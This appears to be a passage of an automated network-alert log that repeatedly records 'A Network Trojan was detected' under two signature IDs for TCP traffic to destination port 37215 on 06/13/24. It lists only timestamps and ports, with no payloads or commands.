              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836451
              SID:2829579
              Source Port:54244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355299
              SID:2835222
              Source Port:39498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677464
              SID:2829579
              Source Port:52192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804902
              SID:2835222
              Source Port:60808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.218533
              SID:2835222
              Source Port:41150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543758
              SID:2829579
              Source Port:33388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677650
              SID:2829579
              Source Port:53134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174243
              SID:2829579
              Source Port:50796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457263
              SID:2829579
              Source Port:60254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.353161
              SID:2829579
              Source Port:54372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273541
              SID:2835222
              Source Port:45824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485484
              SID:2835222
              Source Port:48174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821299
              SID:2829579
              Source Port:51852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783923
              SID:2835222
              Source Port:34626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157851
              SID:2835222
              Source Port:49776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480708
              SID:2835222
              Source Port:53310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655392
              SID:2829579
              Source Port:57888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871470
              SID:2829579
              Source Port:33838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834765
              SID:2835222
              Source Port:58422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279062
              SID:2829579
              Source Port:35978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258197
              SID:2835222
              Source Port:43086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824653
              SID:2829579
              Source Port:58128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277570
              SID:2829579
              Source Port:46280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307359
              SID:2835222
              Source Port:38642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406674
              SID:2829579
              Source Port:45440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028368
              SID:2829579
              Source Port:54226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786793
              SID:2829579
              Source Port:40278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457534
              SID:2835222
              Source Port:48618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092782
              SID:2829579
              Source Port:48238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128147
              SID:2829579
              Source Port:54022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131375
              SID:2835222
              Source Port:56446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670621
              SID:2829579
              Source Port:33004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988528
              SID:2829579
              Source Port:58956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.200085
              SID:2835222
              Source Port:55312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269572
              SID:2835222
              Source Port:37514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359846
              SID:2835222
              Source Port:40322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160004
              SID:2835222
              Source Port:33646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245293
              SID:2835222
              Source Port:37230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356450
              SID:2835222
              Source Port:59478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802617
              SID:2835222
              Source Port:34894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262682
              SID:2829579
              Source Port:36544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632551
              SID:2829579
              Source Port:52996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710249
              SID:2829579
              Source Port:55544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.954075
              SID:2829579
              Source Port:47940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091469
              SID:2829579
              Source Port:58336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308428
              SID:2835222
              Source Port:53420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.838901
              SID:2829579
              Source Port:48078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256940
              SID:2835222
              Source Port:37378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.969269
              SID:2835222
              Source Port:36634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454551
              SID:2835222
              Source Port:42328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.455258
              SID:2835222
              Source Port:38196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279997
              SID:2835222
              Source Port:39998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098483
              SID:2835222
              Source Port:58740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.781277
              SID:2835222
              Source Port:60236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257263
              SID:2829579
              Source Port:57350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669910
              SID:2829579
              Source Port:40556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175094
              SID:2829579
              Source Port:60174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573578
              SID:2829579
              Source Port:37790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.172944
              SID:2829579
              Source Port:47932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725351
              SID:2835222
              Source Port:59262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.436589
              SID:2829579
              Source Port:56660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098272
              SID:2829579
              Source Port:36974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229080
              SID:2835222
              Source Port:51738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093382
              SID:2835222
              Source Port:60954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076874
              SID:2835222
              Source Port:47832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887691
              SID:2829579
              Source Port:52264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.179058
              SID:2829579
              Source Port:55392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555515
              SID:2835222
              Source Port:37736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213772
              SID:2829579
              Source Port:48158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212974
              SID:2829579
              Source Port:48308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279278
              SID:2829579
              Source Port:55452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196283
              SID:2829579
              Source Port:52380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.400626
              SID:2829579
              Source Port:38760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912335
              SID:2829579
              Source Port:34404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300693
              SID:2829579
              Source Port:53062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306814
              SID:2835222
              Source Port:33886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.680841
              SID:2835222
              Source Port:38554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677542
              SID:2829579
              Source Port:40558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.175246
              SID:2835222
              Source Port:36900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991693
              SID:2829579
              Source Port:56572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545570
              SID:2835222
              Source Port:42024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217933
              SID:2829579
              Source Port:49630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088362
              SID:2835222
              Source Port:34220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509209
              SID:2835222
              Source Port:42324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.150294
              SID:2835222
              Source Port:56902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677710
              SID:2835222
              Source Port:55356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092806
              SID:2835222
              Source Port:60576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995113
              SID:2829579
              Source Port:39916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610052
              SID:2835222
              Source Port:53976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088728
              SID:2835222
              Source Port:52952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695323
              SID:2829579
              Source Port:41854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550291
              SID:2829579
              Source Port:49194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694908
              SID:2835222
              Source Port:43034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317886
              SID:2835222
              Source Port:56748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175204
              SID:2835222
              Source Port:59406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438234
              SID:2829579
              Source Port:54872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300861
              SID:2835222
              Source Port:56712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488142
              SID:2829579
              Source Port:48172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041529
              SID:2835222
              Source Port:60944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278013
              SID:2829579
              Source Port:45212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096157
              SID:2829579
              Source Port:49026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.315992
              SID:2835222
              Source Port:51808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265273
              SID:2835222
              Source Port:40416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095060
              SID:2835222
              Source Port:45818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.970190
              SID:2835222
              Source Port:58942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257561
              SID:2829579
              Source Port:36720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.154325
              SID:2835222
              Source Port:52760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.136334
              SID:2835222
              Source Port:44392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629534
              SID:2835222
              Source Port:52274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308656
              SID:2835222
              Source Port:54526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992833
              SID:2835222
              Source Port:48066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569334
              SID:2829579
              Source Port:55956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.617918
              SID:2835222
              Source Port:51234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.945880
              SID:2829579
              Source Port:54706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306147
              SID:2829579
              Source Port:46802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404263
              SID:2835222
              Source Port:58564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992682
              SID:2829579
              Source Port:54196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439973
              SID:2835222
              Source Port:55480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.218047
              SID:2835222
              Source Port:52002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.702601
              SID:2829579
              Source Port:33884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821928
              SID:2829579
              Source Port:53350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.150455
              SID:2835222
              Source Port:48906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.784506
              SID:2829579
              Source Port:36898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611791
              SID:2835222
              Source Port:52804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.831677
              SID:2829579
              Source Port:47282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125150
              SID:2829579
              Source Port:53136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177091
              SID:2835222
              Source Port:50712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941905
              SID:2835222
              Source Port:36172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407164
              SID:2829579
              Source Port:37428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403958
              SID:2835222
              Source Port:39004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153986
              SID:2829579
              Source Port:52820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194914
              SID:2829579
              Source Port:50836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670765
              SID:2835222
              Source Port:41832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730502
              SID:2829579
              Source Port:55320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307323
              SID:2835222
              Source Port:50724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488405
              SID:2829579
              Source Port:54580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348641
              SID:2835222
              Source Port:51746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079505
              SID:2829579
              Source Port:48330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.086916
              SID:2829579
              Source Port:46064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991905
              SID:2829579
              Source Port:45500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403339
              SID:2835222
              Source Port:57848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671463
              SID:2835222
              Source Port:43054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176784
              SID:2835222
              Source Port:38816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633429
              SID:2835222
              Source Port:51396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.115781
              SID:2835222
              Source Port:44846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416576
              SID:2829579
              Source Port:51000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.950212
              SID:2835222
              Source Port:40836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656981
              SID:2835222
              Source Port:52798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.154212
              SID:2829579
              Source Port:49626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508625
              SID:2835222
              Source Port:47688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834084
              SID:2835222
              Source Port:60214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.379560
              SID:2835222
              Source Port:52494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.987953
              SID:2829579
              Source Port:41404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048789
              SID:2835222
              Source Port:52410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025922
              SID:2835222
              Source Port:40336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248294
              SID:2835222
              Source Port:56504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090897
              SID:2835222
              Source Port:55670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215717
              SID:2829579
              Source Port:48398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.237807
              SID:2829579
              Source Port:50798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301487
              SID:2835222
              Source Port:45080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274719
              SID:2829579
              Source Port:59982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.727152
              SID:2829579
              Source Port:53034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784884
              SID:2829579
              Source Port:57220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437480
              SID:2835222
              Source Port:55878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821963
              SID:2829579
              Source Port:48718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509183
              SID:2829579
              Source Port:53194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679292
              SID:2835222
              Source Port:46024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.484815
              SID:2835222
              Source Port:60358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.978966
              SID:2835222
              Source Port:56072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569132
              SID:2835222
              Source Port:39076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503823
              SID:2829579
              Source Port:38826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377084
              SID:2829579
              Source Port:34678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370747
              SID:2835222
              Source Port:60604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996053
              SID:2829579
              Source Port:40744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243477
              SID:2835222
              Source Port:33358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195203
              SID:2835222
              Source Port:41422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156245
              SID:2829579
              Source Port:50144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487735
              SID:2829579
              Source Port:46006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215112
              SID:2835222
              Source Port:39996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093441
              SID:2835222
              Source Port:48148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872240
              SID:2829579
              Source Port:41302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247776
              SID:2829579
              Source Port:45958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487083
              SID:2835222
              Source Port:54724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787469
              SID:2835222
              Source Port:49126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247330
              SID:2835222
              Source Port:46728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.310251
              SID:2835222
              Source Port:38264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568215
              SID:2829579
              Source Port:48572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476752
              SID:2829579
              Source Port:57230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256678
              SID:2835222
              Source Port:33996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417810
              SID:2835222
              Source Port:49500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.782699
              SID:2835222
              Source Port:49306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988584
              SID:2829579
              Source Port:59476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317468
              SID:2835222
              Source Port:56582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612794
              SID:2835222
              Source Port:49022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216225
              SID:2835222
              Source Port:35212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568251
              SID:2829579
              Source Port:34754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013277
              SID:2835222
              Source Port:49526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
